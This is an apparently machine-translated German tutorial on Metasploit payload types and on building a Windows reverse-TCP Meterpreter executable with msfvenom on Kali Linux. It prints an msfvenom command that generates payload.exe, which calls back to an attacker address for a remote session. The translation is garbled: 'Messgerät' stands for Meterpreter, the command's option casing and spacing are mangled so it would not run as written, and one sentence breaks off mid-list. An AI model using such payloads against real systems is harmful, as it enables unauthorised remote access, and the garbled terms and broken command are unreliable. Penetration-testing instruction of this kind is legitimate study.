Metasploit ist eine der am häufigsten verwendeten Plattformen für Penetrationstests, Hacking und sogar informelle Spiele. Wir müssen verstehen, wie die Komponenten und Nutzlasten sie effektiv verwenden, um sie effektiv zu verwenden. In simpistischer Hinsicht ist eine Nutzlast eine Aktion, die ausgeführt werden muss, wenn ein Exploit seine Ausführung abgeschlossen hat. Eine Nutzlast ist ein Teil des Code, den der Exploit ausführt. Exploits werden verwendet, um Zugriff auf ein System zu erhalten, und Nutzlasten führen bestimmte Aufgaben aus. Metasploit verfügt über viele Nutzlasten, z. Mehrere Nutzlasten funktionieren mit den meisten Exploits. Das Finden der richtigen Nutzlast, die mit dem Exploit funktioniert, erfordert jedoch einige Untersuchungen. Wenn Sie sich für einen Exploit entschieden haben, verwenden Sie den Befehl "Payloads" von Metasploit, um eine Liste von Nutzlasten zu erhalten, die damit funktionieren.
Arten von Nutzlasten
In Metasploit gibt es einige verschiedene Arten von Nutzlasten. Diese drei Grundtypen sind diejenigen, die Sie schließlich am meisten verwenden werden:
Einzel
Singles sind extrem klein und sollen ein Gespräch initiieren, bevor sie zu einer anderen Bühne übergehen.
Stager
Die Nutzlast verwendet den Stager, um eine Netzwerkverbindung zwischen dem Zielsystem und dem Nutzlastprozessor des Metasploit -Servers herzustellen. Mit dem Stager können Sie eine größere, kompliziertere Nutzlast laden und einfügen, die die Bühne mit einer kleineren Nutzlast bezeichnet.
Messgerät
Messgerät ist zu einer Metasploit -Angriffsnutzlast geworden, die einen Eindringlingsfaktor ergibt, der sich auf das Durchsuchen und Ausführen von Code auf dem Zielgerät auswirkt. Messgerät ist eine Nur-Speicheranwendung, die nicht an Disc schreibt. Messgerät versuchte, sich dem angegriffenen Prozess zu injizieren, von wo aus er zu anderen Betriebsprozessen übergehen kann. Daher werden keine neuen Prozesse generiert. Messvorschriften wurden erstellt, um die Nachteile der Verwendung spezialisierter Nutzlasten zu vermeiden, während das Schreiben des Befehls und die Versicherung verschlüsselter Kommunikation ermöglicht wird. Der Nachteil der Verwendung spezifischer Nutzlast besteht darin, dass Alarms ausgelöst werden können, wenn ein neuerer Prozess im gesamten Zielsystem beginnt.
Erstellen Sie Nutzlast mit Metasploit in Kali Linux
Befolgen Sie alle unten beschriebenen Schritte, um mit Metasploit in Kali Linux Nutzlast zu erstellen
Schritt 1: Zugriff auf MSFConsole
MSFConsole ist das einzige Mittel, um auf den Großteil der Funktionalität von Metasploit zuzugreifen. MSFConsole bietet der Plattform eine Konsolenschnittstelle. MSFConsole war die MSF -Schnittstelle mit den größten Funktionen und ist die stabilste. Die vollständige Readline -Fähigkeit, die Tabellen und die Fertigstellung des Befehls werden von MSFConsole bereitgestellt. Externe Befehle können aus dem MSFConsole ausgeführt werden. Verwenden Sie den folgenden Befehl, um auf MSFConsole unter Kali Linux zuzugreifen.
$ msfconsole
Schritt 2: Zugriff auf MSFvenom
Die Nutzlast, die wir mit MSFvenom ausführen, ist eine umgekehrte TCP -Nutzlast. Diese Nutzlast erstellt eine ausführbare Datei, die beim Start eine Verbindung zwischen dem Computer des Benutzers und unserem Metasploit -Handler herstellt, sodass wir eine Messgerät -Sitzung durchführen können. Verwenden Sie den folgenden Befehl, um auf MSFvenom unter Kali Linux zuzugreifen.
$ msfvenom -p
Schritt 3: Nutzlast erstellen
Verwenden Sie den folgenden Befehl, um eine Nutzlast in Metasploit unter Kali Linux zu erstellen.
$ msfvenom -P Windows/MeterPreter/Reverse_tcp lhost = 192.168.43.28 LPORT = 6001 -f exe -o Nutzlast.exe
Sie können die Option -P verwenden, um anzugeben, welche Nutzlast Sie verwenden möchten. Lhost scheint die IP -Adresse des Angreifers zu sein, an die die Nutzlast verlinkt werden soll. Lport ist genauso wie oben; Dies ist der Port, mit dem die Nutzlast verlinkt wird, und muss im Handler konfiguriert werden. -F weist msfvenom an, wie die Nutzlast generiert wird. In diesem Fall entscheiden wir uns für ein ausführliches Programm oder eine Exe. Die Nutzlast, die durch die Ausführung des obigen Befehls erstellt wurde.
Um zu überprüfen, wo es erstellt wurde, navigieren wir zum Heimverzeichnis. Aus dem unterhalb des angehaltenen Screenshot können Sie diese Nutzlast überprüfen.exe wurde erfolgreich erstellt.
Sie können seine Eigenschaften überprüfen, indem Sie darauf klicken. Die Größe der erstellten Nutzlast ist die gleiche wie auf dem Terminalbildschirm angezeigt.
Abschluss
Dieser Artikel hat eine kurze Einführung in Bezug auf Nutzlasten und ihre Typen bereitgestellt. Wir haben Schritt-für-Schritt-Anweisungen befolgt, um Nutzlasten in Metasploit im Kali Linux-Betriebssystem zu erstellen.